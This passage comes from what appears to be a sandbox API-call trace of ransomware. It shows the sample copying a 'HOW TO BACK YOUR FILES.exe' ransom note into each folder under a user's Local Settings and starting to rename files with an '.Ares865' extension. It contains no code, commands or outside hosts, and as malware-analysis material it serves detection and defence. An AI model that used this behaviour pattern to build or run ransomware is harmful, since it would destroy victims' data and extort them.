Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.708] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.708] GetLastError () returned 0x0 [0104.708] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.708] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.708] CloseHandle (hObject=0x120) returned 1 [0104.708] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.708] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.708] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ce9e420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ce9e420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.709] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.709] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.709] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Event Viewer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Event Viewer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Event Viewer" [0104.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0104.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0104.709] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Event Viewer") returned 84 [0104.709] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Event Viewer" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Event Viewer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Event Viewer" [0104.709] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.709] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Event Viewer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\event viewer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.710] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.710] GetLastError () returned 0x0 [0104.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.710] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.710] CloseHandle (hObject=0x120) returned 1 [0104.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.710] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.710] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Event Viewer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x32121370, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4dd44f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd44f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.710] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.710] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.710] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Credentials" [0104.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0104.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0104.711] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Credentials") returned 83 [0104.711] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Credentials" [0104.711] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.711] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.711] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.712] GetLastError () returned 0x0 [0104.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.712] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.712] CloseHandle (hObject=0x120) returned 1 [0104.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.712] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.712] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4dd44f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd44f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.712] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.712] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.712] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History" [0104.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321060 | out: hHeap=0x2b0000) returned 1 [0104.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0104.712] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History") returned 69 [0104.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History" [0104.712] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.712] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.713] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.713] GetLastError () returned 0x0 [0104.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.713] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.713] CloseHandle (hObject=0x120) returned 1 [0104.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.713] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.713] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cec4580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cec4580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.714] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.714] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.715] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low" [0104.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0104.715] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0104.715] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low") returned 73 [0104.715] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low" [0104.715] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.715] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.716] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.716] GetLastError () returned 0x0 [0104.716] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.716] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.716] CloseHandle (hObject=0x120) returned 1 [0104.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.716] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.716] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cec4580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cec4580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.716] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.716] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.716] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5" [0104.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0104.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0104.717] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5") returned 85 [0104.717] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5" [0104.717] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.717] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\history\\low\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.717] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.718] GetLastError () returned 0x0 [0104.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.718] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.718] CloseHandle (hObject=0x120) returned 1 [0104.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.718] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.718] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6ceea6e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ceea6e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.718] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.718] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.718] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\MSHist012017071220170713", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\MSHist012017071220170713") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\MSHist012017071220170713" [0104.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fc8 | out: hHeap=0x2b0000) returned 1 [0104.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0104.718] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\MSHist012017071220170713") returned 110 [0104.718] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\MSHist012017071220170713" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\MSHist012017071220170713") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\MSHist012017071220170713" [0104.718] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.718] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\MSHist012017071220170713\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\history\\low\\history.ie5\\mshist012017071220170713\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.719] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.719] GetLastError () returned 0x0 [0104.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.719] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.719] CloseHandle (hObject=0x120) returned 1 [0104.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.720] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.720] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\Low\\History.IE5\\MSHist012017071220170713\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x45c34df0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x6cf10840, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cf10840, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.720] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.720] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.720] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5" [0104.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0104.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0104.720] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5") returned 81 [0104.720] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5" [0104.720] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.720] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.721] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.721] GetLastError () returned 0x0 [0104.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.721] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.721] CloseHandle (hObject=0x120) returned 1 [0104.721] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.721] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.721] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cf10840, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cf10840, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.721] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.721] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.722] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 99 [0104.722] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 